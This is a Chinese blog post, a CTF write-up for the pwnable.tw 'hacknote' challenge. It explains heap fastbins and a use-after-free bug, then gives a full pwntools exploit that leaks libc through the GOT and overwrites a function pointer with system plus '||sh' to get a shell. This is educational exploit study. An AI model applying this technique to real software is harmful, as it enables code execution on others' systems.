<!DOCTYPE html>
<html>
  
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <meta name="author" content="starsdestinations">
  
  
  <title>2019-4-2-hacknote题解 | Hexo</title>

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  
    <meta name="keywords" content="Hexo, Theme-AD">
  

  
  <meta name="description" content="starsdestinations的小站">

  

  <script src="//cdn.jsdelivr.net/npm/leancloud-storage@3.11.1/dist/av-min.js" async></script>

  
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML" async></script>
  

  
    <script src="//unpkg.com/valine/dist/Valine.min.js" async></script>
  

  

  <script>
  // theme-ad's config script
  // it can be used in every script
  
  window.AD_CONFIG = {
    leancloud: {"appid":"Hyq9wkH495DgNHWhDQCOfQSp-gzGzoHsz","appkey":"WaR7nrzhliHj9aVwdQzkdlGd","comment":true,"count":true},
    welcome: {"enable":false,"interval":30},
    start_time: "2019-03-13",
    passwords: ["34d4f0765ce3da2322e6cfdce543facea26fe4f4eadde5bd0a986b9df76bd284", ],
    is_post: true,
    lock: false,
    author: "starsdestinations",
    share: {"twitter":false,"facebook":false,"weibo":false,"qq":true,"wechat":true},
    mathjax: true,
    page_type: "",
    root: "/"
  };
</script>

  <script src="/vendor/sha256.min.js"></script>
<script src="/js/auth.js"></script>
<script src="/js/index.js"></script>
<script src="/vendor/qrcode.min.js"></script>

  
    <link rel="icon" href="/images/favicon.ico">
    <link rel="apple-touch-icon" href="/images/touch-icon.png">
  

  <link href="//netdna.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

  <link rel="stylesheet" href="/css/index.css">
<link rel="stylesheet" href="/styles/components/highlight/highlight.css">

  
</head>
  <body>
    <header class="site-header">
  <div class="site-header-brand">
    
      <span class="site-header-brand-title">
        <a href="/">starsdestinations</a>
      </span>
    
    
      <span class="site-header-brand-motto"> | 自学历程</span>
    
  </div>
  <div class="site-header-right">
    <nav class="site-header-navigation">
      
        <a href="/" target="_self">首页</a>
      
        <a href="/archives/" target="_self">归档</a>
      
        <a href="/tags/" target="_self">标签</a>
      
        <a href="/categories/" target="_self">分类</a>
      
        <a href="/friends/" target="_self">友链</a>
      
        <a href="/about/" target="_self">关于</a>
      
    </nav>
    <div class="site-header-btn">
      
        <a href="https://github.com/starsdestinations/" target="_blank" id="site-github">
          <i class="fa fa-github-alt"></i>
        </a>
      
      <a href="javascript:void(0);" id="site-search">
        <i class="fa fa-search"></i>
      </a>
      <a href="javascript:void(0);" id="site-nav-btn">
        <i class="fa fa-ellipsis-v"></i>
      </a>
    </div>
  </div>
</header>
<nav class="table-content" id="site-nav">
  <div class="table-content-title">
    <span>导航</span>
  </div>
  <div class="table-content-main">
    <ol class="toc">
      
        <li class="toc-item">
          <a href="/" target="_self">
            首页
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/archives/" target="_self">
            归档
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/tags/" target="_self">
            标签
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/categories/" target="_self">
            分类
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/friends/" target="_self">
            友链
          </a>
        </li>
      
        <li class="toc-item">
          <a href="/about/" target="_self">
            关于
          </a>
        </li>
      
    </ol>
  </div>
</nav>
<div id="site-process"></div>
    <main>
      
  <div class="passage">
  <div class="passage-meta">
    <span>
      <i class="fa fa-calendar"></i>2019-04-02
    </span>
    
    
      <span>
        | <i class="fa fa-unlock-alt"></i>UNLOCK
      </span>
    
  </div>
  <h1 class="passage-title">
    2019-4-2-hacknote题解
  </h1>
  
  <article class="passage-article">
    <h1 id="pwnabletw-hacknote"><a href="#pwnabletw-hacknote" class="headerlink" title="pwnabletw-hacknote"></a>pwnabletw-hacknote</h1><p>借着这道比较基础的uaf（use after free）的题目回顾一下堆溢出<br>先简单说说一下堆<br>堆基础</p>
<hr>
<p>可以通过gdb的vmmap查看内存空间<br><img src="/images/2019-4-2-hacknote/2019-4-2-20-53.png" alt="avatar"><br>其中[heap]就是堆空间，堆跟栈不同，堆是沿着地址高位增长的</p>
<p>堆分配的基本策略就是malloc(size)时系统分配堆大小的必定是比size大或等于的8\16的倍数（32位系统为8的倍数，在64位系统则是16的倍数），并且会有一个8字节的堆头（header），里面记录的堆的信息。（之后会在堆专门的学习笔记里详细展开）<br>（目前在我的学习中，只有malloc及其相似的一类函数会分配堆。）<br>所以在32位系统中，最低能分配的就是16字节的堆块（malloc（0）会返回NULL值，或者实际地址，具体取决于系统）</p>
<h2 id="uaf基础"><a href="#uaf基础" class="headerlink" title="uaf基础"></a>uaf基础</h2><p>当free堆块时，若是没有将堆块指针置NULL的话，那么就可以通过这个指针重新访问堆块，这时候堆块的内容可能为空，也可能是某个地址，最终导致漏洞出现。利用漏洞的方式就在于操作系统的堆管理方式，当一个堆块free后，并不是还给操作系统，而是放入表(bin)中，linux的堆管理存在着127个bin，不同bin的区别主要在于每个bin链表中存放的堆块（chunk）大小不同，像这道hacknote我们就只需要存放16-80字节的fastbin，当我们再次申请堆块空间时，系统就首先会从这些bin中找到最合适大小的堆块空间给我们。这种机制配合uaf再配合对堆内容的写入就能实现任意地址跳转了。</p>
<h2 id="hacknote函数解析"><a href="#hacknote函数解析" class="headerlink" title="hacknote函数解析"></a>hacknote函数解析</h2><p><img src="/images/2019-4-2-hacknote/2019-4-2-21-12.png" alt="avatar"><br>这次专注于基础的堆溢出，有用的信息就是该程序是16位</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">  v2 = __readgsdword(<span class="number">0x14</span>u);<span class="comment">//开启CANARY后会在每个函数多出这个，从汇编上可以看出是在栈低，也就是ebp上方填入一个数字，跟本题无关</span></span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      sub_8048956();</span><br><span class="line">      read(<span class="number">0</span>, &amp;buf, <span class="number">4u</span>);</span><br><span class="line">      v0 = atoi(&amp;buf);</span><br><span class="line">      <span class="keyword">if</span> ( v0 != <span class="number">2</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      sub_80487D4();<span class="comment">//delete函数</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( v0 &gt; <span class="number">2</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v0 == <span class="number">3</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        sub_80488A5();<span class="comment">//print函数</span></span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> ( v0 == <span class="number">4</span> )</span><br><span class="line">          <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">LABEL_13:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"Invalid choice"</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v0 != <span class="number">1</span> )</span><br><span class="line">        <span class="keyword">goto</span> LABEL_13;</span><br><span class="line">      sub_8048646();<span class="comment">//add函数</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>main函数挺简单的，重点就三个函数，delete、print、add，其中uaf漏洞就存在于delete中，接下来我们看delete函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">v3 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Index :"</span>);</span><br><span class="line">read(<span class="number">0</span>, &amp;buf, <span class="number">4u</span>);</span><br><span class="line">v1 = atoi(&amp;buf);</span><br><span class="line"><span class="keyword">if</span> ( v1 &lt; <span class="number">0</span> || v1 &gt;= dword_804A04C )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Out of bound!"</span>);</span><br><span class="line">  _exit(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ( ptr[v1] )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">free</span>(*((<span class="keyword">void</span> **)ptr[v1] + <span class="number">1</span>));</span><br><span class="line">  <span class="built_in">free</span>(ptr[v1]);<span class="comment">//重点在这，free后没有把指针置null，导致堆块虽然清空了，但是指针还保存着堆栈的地址，从而能访问空的堆栈，另外值得注意的是先free掉ptr[v1]+1指向的地址（字符串context），然后再free ptr[v1]</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Success"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v3;</span><br></pre></td></tr></table></figure>

<p>知道漏洞是uaf后就要开始考虑怎么利用了,先看看add函数是怎么申请空间的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">v5 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line"><span class="keyword">if</span> ( dword_804A04C &lt;= <span class="number">5</span> )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">4</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !ptr[i] )</span><br><span class="line">    &#123;</span><br><span class="line">      ptr[i] = <span class="built_in">malloc</span>(<span class="number">8u</span>);<span class="comment">//首先申请一个8字节的空间，实际上会分配16字节</span></span><br><span class="line">      <span class="keyword">if</span> ( !ptr[i] )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"Alloca Error"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      *(_DWORD *)ptr[i] = sub_804862B;<span class="comment">//这里是让刚才申请的堆块头部放入指向sub_804862B的指针，这样访问该堆块的时候就会执行这个函数，这个函数的作用就是put，并且参数是堆块本身，之后会用于地址泄露</span></span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">"Note size :"</span>);</span><br><span class="line">      read(<span class="number">0</span>, &amp;buf, <span class="number">8u</span>);</span><br><span class="line">      size = atoi(&amp;buf);</span><br><span class="line">      v0 = ptr[i];</span><br><span class="line">      v0[<span class="number">1</span>] = <span class="built_in">malloc</span>(size);<span class="comment">//第二次申请堆空间，第一次申请的空间ptr[i]就是v0[0]，第二次申请的空间的指针就会存放到v0[1]中，这样put函数就能输出第二次申请的空间内储存的值了</span></span><br><span class="line">      <span class="keyword">if</span> ( !*((_DWORD *)ptr[i] + <span class="number">1</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">"Alloca Error"</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">"Content :"</span>);</span><br><span class="line">      read(<span class="number">0</span>, *((<span class="keyword">void</span> **)ptr[i] + <span class="number">1</span>), size);</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"Success !"</span>);</span><br><span class="line">      ++dword_804A04C;</span><br><span class="line">      <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v5;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Full"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v5;</span><br></pre></td></tr></table></figure>

<p>这么分析可能还不够直白，上手操作一下<br><img src="/images/2019-4-2-hacknote/2019-4-2-21-44.png" alt="avatar"><br>这是我们要申请的堆块</p>
<p><img src="/images/2019-4-2-hacknote/2019-4-2-21-47.png" alt="avatar"><br>可以看到在堆块的起始位置0x0804b000偏移0xc的位置有个0x151的偏移，那就是存储着内容的堆的起始地点（为什么和实际index：0的堆块差了15个字节以后再讲），可以看到0x804b160就存储着我们刚申请的堆块，其中0x0804862b就是指向put函数的地址，0x0804b170就是字符串“aaaaaaaaaaaaaaa”的位置，之后会作为put函数的参数。</p>
<p>让我们来看一下print函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">v3 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Index :"</span>);</span><br><span class="line">read(<span class="number">0</span>, &amp;buf, <span class="number">4u</span>);</span><br><span class="line">v1 = atoi(&amp;buf);</span><br><span class="line"><span class="keyword">if</span> ( v1 &lt; <span class="number">0</span> || v1 &gt;= dword_804A04C )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Out of bound!"</span>);</span><br><span class="line">  _exit(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ( ptr[v1] )</span><br><span class="line">  (*(<span class="keyword">void</span> (__cdecl **)(<span class="keyword">void</span> *))ptr[v1])(ptr[v1]);<span class="comment">//ptr[v1]就是堆块地址，堆块头存储着put函数的地址，put函数的参数就是ptr[v1]，也就是它本身。</span></span><br><span class="line"><span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v3;</span><br></pre></td></tr></table></figure>

<p>再看看puts函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> <span class="built_in">puts</span>(*(<span class="keyword">const</span> <span class="keyword">char</span> **)(a1 + <span class="number">4</span>));</span><br></pre></td></tr></table></figure>

<p>可以看到put会输出a1+4，也就是ptr[v1]+4，那个位置存储着字符串的地址</p>
<h2 id="hacknote题解"><a href="#hacknote题解" class="headerlink" title="hacknote题解"></a>hacknote题解</h2><p>分析完函数，弄懂整个程序后开始构造脚本了，首先我们要想办法泄露地址，因此要在第一次申请的堆栈内写入我们需要的地址，比如read()，然后用得到的read()函数实际地址减去libc中read的偏移量，得到程序加载libc的基址，再用这个基址加上system的偏移量，得到system函数在程序实际执行时的地址，最后再写入一次system的地址和字符串“sh”，执行后得到shell</p>
<p>想要往第一次申请的堆块中写入内容，就要利用到fastbin的特性，free后的堆块会放到fastbin链表的表尾，在之后申请同样大小的堆块时会先分配表尾的空间。所以我们先add两次，输入的context size等于16（这里只要大于8就行，也就是不要让两个context和ptr[0]free后在一个链表就行），然后都free掉（delete index0和index1），这时index0[0]在fastbin的16字节链表的表头，index1[0]在表尾，至于两个context则在fastbin的32字节链表。<br>当我们再add一个context size为8的index2时，index2[0]的16字节空间会利用fastbin16字节链表表尾的index1[0]，而context申请的16字节空间就在index0[0]的位置，这时候我们输入的context就会把index0的头部修改了。</p>
<p><img src="/images/2019-4-2-hacknote/2019-4-2-22-25.png" alt="avatar"><br>可以看到我们add两次后的堆空间内容，这里我申请的context size为16，所以它给我对齐成了32字节（这里有点困惑，按理来说32位系统应该分配给我24字节的空间，delete后之后我尝试申请24字节的空间，给我的也是原本那片空间，可见的确是分配了32字节）</p>
<p><img src="/images/2019-4-2-hacknote/2019-4-2-22-29.png" alt="avatar"><br>当我分别delete index0和index1然后申请了size=8的index2后<br>堆空间变了，原本index0[0]的空间内容变成了我输入的字符串“cccccccc”<br>然后就可以写我们的脚本了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p=process(<span class="string">"./hacknote"</span>)</span><br><span class="line"><span class="comment">#libc=ELF('./libc_32.so.6',checksec=False)</span></span><br><span class="line">libc=ELF(<span class="string">'/lib/i386-linux-gnu/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">//ldd hacknote得到在本机使用的库</span><br><span class="line">elf=ELF(<span class="string">'./hacknote'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line"></span><br><span class="line">read_libc=libc.symbols[<span class="string">'read'</span>]</span><br><span class="line">read_got=elf.got[<span class="string">'read'</span>]</span><br><span class="line">read_symbol=elf.symbols[<span class="string">"read"</span>]</span><br><span class="line">system_libc=libc.symbols[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Your choice :"</span>,<span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Note size :"</span>,<span class="string">"16"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Content :"</span>,<span class="string">"a"</span>*<span class="number">15</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Your choice :"</span>,<span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Note size :"</span>,<span class="string">"16"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Content :"</span>,<span class="string">"a"</span>*<span class="number">15</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Your choice :"</span>,<span class="string">"2"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Index :"</span>,<span class="string">"0"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Your choice :"</span>,<span class="string">"2"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Index :"</span>,<span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Your choice :"</span>,<span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Note size :"</span>,<span class="string">"8"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Content :"</span>,p32(<span class="number">0x0804862b</span>)+p32(read_got))</span><br><span class="line">p.sendlineafter(<span class="string">"Your choice :"</span>,<span class="string">"3"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Index :"</span>,<span class="string">"0"</span>)</span><br><span class="line">a=p.recv()</span><br><span class="line">read_addr=u32(a[:<span class="number">4</span>])</span><br><span class="line">print(<span class="string">"a--------------"</span>)</span><br><span class="line">print(a)</span><br><span class="line">print(<span class="string">"base_addr---------------"</span>)</span><br><span class="line">print(hex(read_addr))</span><br><span class="line"></span><br><span class="line">base_addr=read_addr-read_libc</span><br><span class="line">system_addr=system_libc+base_addr</span><br><span class="line">p.sendline(<span class="string">"2"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Index :"</span>,<span class="string">"2"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Your choice :"</span>,<span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Note size :"</span>,<span class="string">"8"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Content :"</span>,p32(system_addr)+<span class="string">"||sh"</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>这里比较特别的就是system的参数要用到截断字符，因为之前print函数里是(<em>(void (__cdecl *</em>)(void *))ptr[v1])(ptr[v1]);这样调用堆块头指向的函数的，所以我们的system的参数实际上是p32(system_addr)+”sh”，也就是system（p32(system_addr)+”sh”）,这样显然不能实现system（”sh”）,所以就要用到截断字符”||”或者”;”了，<br>system(“hsasoijiojo||sh”)就等于system(“sh”)<br>另外system(“sh”)=system(“/bin/sh”)，两者效果是一样的。</p>
<p>参考链接：<a href="https://www.jianshu.com/p/12c7d96e0bd3" target="_blank" rel="noopener">https://www.jianshu.com/p/12c7d96e0bd3</a><br><a href="https://www.anquanke.com/post/id/150359#h2-24" target="_blank" rel="noopener">https://www.anquanke.com/post/id/150359#h2-24</a></p>

  </article>
  <aside class="table-content" id="site-toc">
  <div class="table-content-title">
    <i class="fa fa-arrow-right fa-lg" id="site-toc-hide-btn"></i>
    <span>目录</span>
  </div>
  <div class="table-content-main">
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#pwnabletw-hacknote"><span class="toc-text">pwnabletw-hacknote</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#uaf基础"><span class="toc-text">uaf基础</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hacknote函数解析"><span class="toc-text">hacknote函数解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hacknote题解"><span class="toc-text">hacknote题解</span></a></li></ol></li></ol>
  </div>
</aside>
  
    <aside class="passage-copyright">
      <div>本文作者: starsdestinations</div>
      
        <div>
          原文链接: 
          <a href="" target="_blank">http://yoursite.com/passages/2019-4-2-hacknote题解/</a>
        </div>
      
      <div>
        版权声明: 本博客所有文章除特别声明外, 均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议. 转载请注明出处!
      </div>
    </aside>
  
  
</div>

    </main>
    
      
<div class="site-comment-contanier" data-plateform="leancloud">
  
    <p id="site-comment-info">
      <i class="fa fa-spinner fa-spin"></i> 评论加载中
    </p>
    <div id="site-comment"></div>
  
</div>
    
    <div class="site-footer-wrapper">
  <footer class="site-footer">
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">博客推荐</h5>
        
          <span class="site-footer-item">
            <a href="https://godbmw.com/" target="_blank">GodBMW</a>
          </span>
        
          <span class="site-footer-item">
            <a href="http://ruanyifeng.com/" target="_blank">阮一峰的个人网站</a>
          </span>
        
      </div>
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">系列教程</h5>
        
          <span class="site-footer-item">
            <a href="https://godbmw.com/categories/webpack4%E7%B3%BB%E5%88%97%E6%95%99%E7%A8%8B/" target="_blank">webpack4系列教程</a>
          </span>
        
          <span class="site-footer-item">
            <a href="https://godbmw.com/design-patterns/" target="_blank">设计模式手册</a>
          </span>
        
      </div>
    
      <div class="site-footer-col">
        <h5 class="site-footer-title">抓到我</h5>
        
          <span class="site-footer-item">
            <a href="https://github.com/starsdestinations/" target="_blank">github</a>
          </span>
        
      </div>
    
    <div class="site-footer-info">
      <i class="fa fa-clock-o"></i> 本站已稳定运行<span id="site-time"></span>
    </div>
    
      <div class="site-footer-info">
        <i class="fa fa-paw"></i> 您是本站第 <span id="site-count"></span> 位访客
      </div>
    
    
      <div class="site-footer-info">
        <i class="fa fa-at"></i> Email: 944641675@qq.com
      </div>
    
    <div class="site-footer-info">
      <i class="fa fa-copyright"></i> 
      2019 <a href="https://github.com/dongyuanxin/theme-ad/" target="_blank">Theme-AD</a>.
      Created by <a href="https://godbmw.com/" target="_blank">GodBMW</a>.
      All rights reserved.
    </div>
  </footer>
</div>
    <div id="site-layer" style="display:none;">
  <div class="site-layer-content">
    <div class="site-layer-header">
      <span class="site-layer-header-title" id="site-layer-title"></span>
      <i class="fa fa-close" id="site-layer-close"></i>
    </div>
    <div class="site-layer-body" id="site-layer-container">
      <div class="site-layer-input" id="site-layer-search" style="display: none;">
        <input type="text">
        <i class="fa fa-search"></i>
      </div>
      <div class="site-layer-reward" id="site-layer-reward" style="display: none;">
        
          <div>
            <img src="/images/wechat.png" alt="WeChat">
            
              <p>WeChat</p>
            
          </div>
        
      </div>
      <div id="site-layer-welcome" style="display:none;"></div>
    </div>
  </div>
</div>
    

<div class="bottom-bar">
  <div class="bottom-bar-left">
    <a href="/passages/2019-4-6-pwnable.kr-unlink/" data-enable="true">
      <i class="fa fa-arrow-left"></i>
    </a>
    <a href="/passages/2019-3-31-上海嘉韦思杯wp-re/" data-enable="true">
      <i class="fa fa-arrow-right"></i>
    </a>
  </div>
  <div class="bottom-bar-right">
    <a href="javascript:void(0);" data-enable="true" id="site-toc-show-btn">
      <i class="fa fa-bars"></i>
    </a>
    
      <a href="#site-comment" data-enable="true">
        <i class="fa fa-commenting"></i>
      </a>
    
    <a href="javascript:void(0);" id="site-toggle-share-btn">
      <i class="fa fa-share-alt"></i>
    </a>
    <a href="javascript:void(0);" id="site-reward">
      <i class="fa fa-thumbs-up"></i>
    </a>
    <a href="javascript:void(0);" id="back-top-btn">
      <i class="fa fa-chevron-up"></i>
    </a>
  </div>
</div>
    <div id="share-btn">
  
  
  
  
    <a id="share-btn-qq" href="javascript:void(0);" target="_blank">
      <i class="fa fa-qq"></i>
    </a>
  
  
    <a id="share-btn-wechat" href="javascript:void(0);" target="_blank">
      <i class="fa fa-wechat"></i>
    </a>
  
</div>
    





    
  </body>
</html>